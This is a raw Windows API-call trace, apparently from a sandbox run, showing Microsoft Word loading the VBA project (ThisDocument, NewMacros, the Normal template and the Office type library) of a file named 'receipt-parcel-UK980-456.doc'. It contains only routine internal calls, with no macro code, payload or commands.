[0017.055] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\Desktop\\Normal", lpString2="") returned 1 [0017.055] SysStringByteLen (bstr="潎浲污") returned 0x6 [0017.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7831c88, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0017.055] SysStringByteLen (bstr="潎浲污") returned 0x6 [0017.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7831c88, cbMultiByte=7, lpWideCharStr=0x7556228, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0017.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x287a40, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0017.055] lstrlenA (lpString="Normal") returned 6 [0017.056] IsCharAlphaA (ch=84) returned 1 [0017.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287cf0, cbMultiByte=-1, lpWideCharStr=0xa397f80, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0017.056] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0017.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287cf0, cbMultiByte=-1, lpWideCharStr=0xa397f80, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0017.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x287af0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0017.056] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0017.056] lstrlenA (lpString="ThisDocument") returned 12 [0017.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287cf0, cbMultiByte=-1, lpWideCharStr=0x287b50, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0017.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x287770, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0017.056] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0017.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2878b0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0017.056] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0017.056] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7935220 [0017.056] IMalloc:GetSize (This=0x7fefe9e5380, pv=0x7935220) returned 0x80 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f56d0 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f5610 [0017.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x287770, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0017.057] CoCreateGuid (in: pguid=0x2874a0 | out: pguid=0x2874a0*(Data1=0x45c49555, Data2=0xdcfc, Data3=0x4bfb, Data4=([0]=0x88, [1]=0x67, [2]=0x54, [3]=0x65, [4]=0xc7, [5]=0xe4, [6]=0x24, [7]=0xa3))) returned 0x0 [0017.057] CoCreateGuid (in: pguid=0x2874b0 | out: pguid=0x2874b0*(Data1=0xba84e087, Data2=0x247d, Data3=0x40e3, Data4=([0]=0x84, [1]=0xe8, [2]=0x6a, [3]=0x89, [4]=0x7d, [5]=0x11, [6]=0xec, [7]=0x51))) returned 0x0 [0017.057] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2874c0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0017.057] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0017.057] GetLocalTime (in: lpSystemTime=0x287398 | out: lpSystemTime=0x287398*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x1f1)) [0017.057] _ultow_s (in: _Value=0x5c2b45a3, _Buffer=0xbd4dfb4, _BufferCount=0x9, _Radix=16 | out: _Buffer="5c2b45a3") returned 0x0 [0017.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="045c2b45a3", cchWideChar=11, lpMultiByteStr=0x287330, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="045c2b45a3", lpUsedDefaultChar=0x0) returned 11 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x170) returned 0x79d7fd0 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x50) returned 0x78a2270 [0017.057] strcpy_s (in: _Dst=0x79e1a70, _DstSize=0xd, _Src="ThisDocument" | out: _Dst="ThisDocument") returned 0x0 [0017.057] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0017.057] wcscpy_s (in: _Destination=0xbd4dfc8, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0017.057] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0017.057] wcscpy_s (in: _Destination=0xbd4dfe8, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0017.057] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x30) returned 0x78185a0 [0017.057] IMalloc:Free (This=0x7fefe9e5380, pv=0x78a2210) [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778be70 [0017.057] IMalloc:Free (This=0x7fefe9e5380, pv=0x78185a0) [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x3d0) returned 0x7957ef0 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778be70 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10) returned 0x79785e0 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x79352b0 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f0b0 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f0a0 [0017.057] wcsncpy_s (in: _Destination=0x2871f0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0017.057] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0017.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x287120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0017.057] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x688) returned 0xbd4ec90 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7935340 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x640) returned 0xbd4f320 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778bcf0 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f0e0 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f210 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778bcc0 [0017.057] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x79353d0 [0017.057] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0017.057] strcpy_s (in: _Dst=0x2873c0, _DstSize=0xa, _Src="_Evaluate" | out: _Dst="_Evaluate") returned 0x0 [0017.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2873c0, cbMultiByte=10, lpWideCharStr=0x287210, cchWideChar=10 | out: lpWideCharStr="_Evaluate") returned 10 [0017.057] IUnknown:AddRef (This=0x788e200) returned 0x4 [0017.057] ITypeLib:RemoteIsName (in: This=0x788e200, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2872e0, pBstrLibName=0x287210 | out: pfName=0x2872e0*=0, pBstrLibName=0x287210) returned 0x0 [0017.057] IUnknown:Release (This=0x788e200) returned 0x3 [0017.057] IUnknown:AddRef (This=0x72e0930) returned 0x6 [0017.057] ITypeLib:RemoteIsName (in: This=0x72e0930, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2872e0, pBstrLibName=0x287210 | out: pfName=0x2872e0*=0, pBstrLibName=0x287210) returned 0x0 [0017.058] IUnknown:Release (This=0x72e0930) returned 0x5 [0017.058] IUnknown:AddRef (This=0x72df850) returned 0x6 [0017.058] ITypeLib:RemoteIsName (in: This=0x72df850, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2872e0, pBstrLibName=0x287210 | out: pfName=0x2872e0*=0, pBstrLibName=0x287210) returned 0x0 [0017.058] IUnknown:Release (This=0x72df850) returned 0x5 [0017.058] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778bb40 [0017.058] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778bba0 [0017.059] wcsncpy_s (in: _Destination=0x287430, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0017.059] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0017.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x287360, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0017.059] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0017.059] CExposedDocFile::CreateStream () returned 0x0 [0017.059] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x420) returned 0xbd4f970 [0017.059] CExposedStream::AddRef () returned 0x2 [0017.059] CExposedStream::Release () returned 0x1 [0017.059] CExposedStream::Release () returned 0x0 [0017.059] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd4f970) [0017.059] CExposedDocFile::AddRef () returned 0x3 [0017.062] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x287d98*=0x0 | out: pptlib=0x287d98*=0x788df30) returned 0x0 [0017.062] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x287a28*=0x0 | out: pptlib=0x287a28*=0x788df30) returned 0x0 [0017.062] ITypeLib:RemoteGetDocumentation (in: This=0x788df30, index=-1, refPtrFlags=0x287a48, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0017.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x287930, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0017.062] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0017.062] IUnknown:QueryInterface (in: This=0x788df30, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x287908 | out: ppvObject=0x287908*=0x0) returned 0x80004002 [0017.062] GetLocalTime (in: lpSystemTime=0x2877b0 | out: lpSystemTime=0x2877b0*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x200)) [0017.062] wcsncpy_s (in: _Destination=0x287460, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0017.062] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0017.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x287390, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0017.062] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0017.062] GetLocalTime (in: lpSystemTime=0x287650 | out: lpSystemTime=0x287650*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x200)) [0017.062] wcsncpy_s (in: _Destination=0x287300, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0017.062] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", cchLength=0x39 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc") returned 0x39 [0017.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", cchWideChar=58, lpMultiByteStr=0x287230, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", lpUsedDefaultChar=0x0) returned 58 [0017.062] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0 [0017.062] IUnknown:QueryInterface (in: This=0x788df30, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x287838 | out: ppvObject=0x287838*=0x0) returned 0x80004002 [0017.062] ITypeLib:RemoteGetLibAttr (in: This=0x788df30, ppTLibAttr=0x287830, pDummy=0x10 | out: ppTLibAttr=0x287830, pDummy=0x10) returned 0x0 [0017.062] ITypeLib:RemoteGetDocumentation (in: This=0x788df30, index=-1, refPtrFlags=0x0, pbstrName=0x287828, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x100000000 | out: pbstrName=0x287828*="Microsoft Office 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x100000000) returned 0x0 [0017.062] StringFromGUID2 (in: rguid=0x7831c80*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52)), lpsz=0x287850, cchMax=39 | out: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 39 [0017.062] _ultow_s (in: _Value=0x2, _Buffer=0x28779a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0017.063] _ultow_s (in: _Value=0x8, _Buffer=0x28779e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0017.063] _ultow_s (in: _Value=0x0, _Buffer=0x2877a2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0017.063] wcscpy_s (in: _Destination=0xbcedba8, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0017.063] wcscpy_s (in: _Destination=0xbcedbae, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0017.063] wcscpy_s (in: _Destination=0xbcedbfa, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0017.063] wcscpy_s (in: _Destination=0xbcedc08, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0017.063] wcscpy_s (in: _Destination=0xbcedc88, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0017.063] ITypeLib:LocalReleaseTLibAttr (This=0x788df30) returned 0x0 [0017.063] wcscpy_s (in: _Destination=0xbd4e008, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0017.063] ITypeLib:RemoteGetDocumentation (in: This=0x788df30, index=-1, refPtrFlags=0x287948, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0017.063] SysStringLen (param_1="Office") returned 0x6 [0017.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0017.063] SysStringLen (param_1="Office") returned 0x6 [0017.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x7832168, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0017.063] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0017.063] strcpy_s (in: _Dst=0x287740, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0017.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287740, cbMultiByte=7, lpWideCharStr=0x287590, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0017.063] IUnknown:AddRef (This=0x788e200) returned 0x4 [0017.063] ITypeLib:RemoteIsName (in: This=0x788e200, szNameBuf="Office", lHashVal=0x107515, pfName=0x287660, pBstrLibName=0x287590 | out: pfName=0x287660*=0, pBstrLibName=0x287590) returned 0x0 [0017.063] IUnknown:Release (This=0x788e200) returned 0x3 [0017.063] IUnknown:AddRef (This=0x72e0930) returned 0x8 [0017.063] ITypeLib:RemoteIsName (in: This=0x72e0930, szNameBuf="Office", lHashVal=0x107515, pfName=0x287660, pBstrLibName=0x287590 | out: pfName=0x287660*=0, pBstrLibName=0x287590) returned 0x0 [0017.063] IUnknown:Release (This=0x72e0930) returned 0x7 [0017.063] IUnknown:AddRef (This=0x72df850) returned 0x6 [0017.063] ITypeLib:RemoteIsName (in: This=0x72df850, szNameBuf="Office", lHashVal=0x107515, pfName=0x287660, pBstrLibName=0x287590 | out: pfName=0x287660*=0, pBstrLibName=0x287590) returned 0x0 [0017.063] IUnknown:Release (This=0x72df850) returned 0x5 [0017.063] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x3c) returned 0x7723bf0 [0017.063] IMalloc:Free (This=0x7fefe9e5380, pv=0x79215c0) [0017.063] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778b9c0 [0017.063] IMalloc:Free (This=0x7fefe9e5380, pv=0x7723bf0) [0017.063] wcsncpy_s (in: _Destination=0x287540, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0017.063] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0017.063] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x12a) returned 0x79da9b0 [0017.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0x79da9b0, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0017.063] IMalloc:Free (This=0x7fefe9e5380, pv=0x79da9b0) [0017.063] wcscpy_s (in: _Destination=0x551e9a0, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0017.063] wcsncpy_s (in: _Destination=0x287580, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0017.063] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x94 [0017.063] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x12a) returned 0x79da9b0 [0017.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=149, lpMultiByteStr=0x79da9b0, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 149 [0017.063] IMalloc:Free (This=0x7fefe9e5380, pv=0x79da9b0) [0017.063] wcsncpy_s (in: _Destination=0x287540, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0017.063] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0017.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x287470, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0017.063] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0017.063] IUnknown:AddRef (This=0x788df30) returned 0x4 [0017.063] IUnknown:QueryInterface (in: This=0x788df30, riid=0x7fef10364b8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x287968 | out: ppvObject=0x287968*=0x0) returned 0x80004002 [0017.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x287930, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0017.064] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0017.064] IUnknown:Release (This=0x788df30) returned 0x3 [0017.064] IUnknown:Release (This=0x788df30) returned 0x2 [0017.064] SysStringByteLen (bstr="潎浲污") returned 0x6 [0017.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b9c8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0017.064] SysStringByteLen (bstr="潎浲污") returned 0x6 [0017.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b9c8, cbMultiByte=7, lpWideCharStr=0x7832168, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0017.064] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xa8) returned 0x7a64b50 [0017.064] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x7f40) returned 0xbcb4080 [0017.067] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x30) returned 0x7818460 [0017.067] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x60) returned 0x79216a0 [0017.069] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0017.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x287bc0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0017.069] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0017.069] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10) returned 0x797cf20 [0017.069] qsort (in: _Base=0x797cf20, _NumOfElements=0x2, _SizeOfElements=0x8, _PtFuncCompare=0x7fef0d5ce28 | out: _Base=0x797cf20) [0017.069] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="NewMacros", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0017.069] bsearch (_Key=0x286af8, _Base=0x797cf20, _NumOfElements=0x2, _SizeOfElements=0x8, _PtFuncCompare=0x7fef0d5ce28) returned 0x797cf28 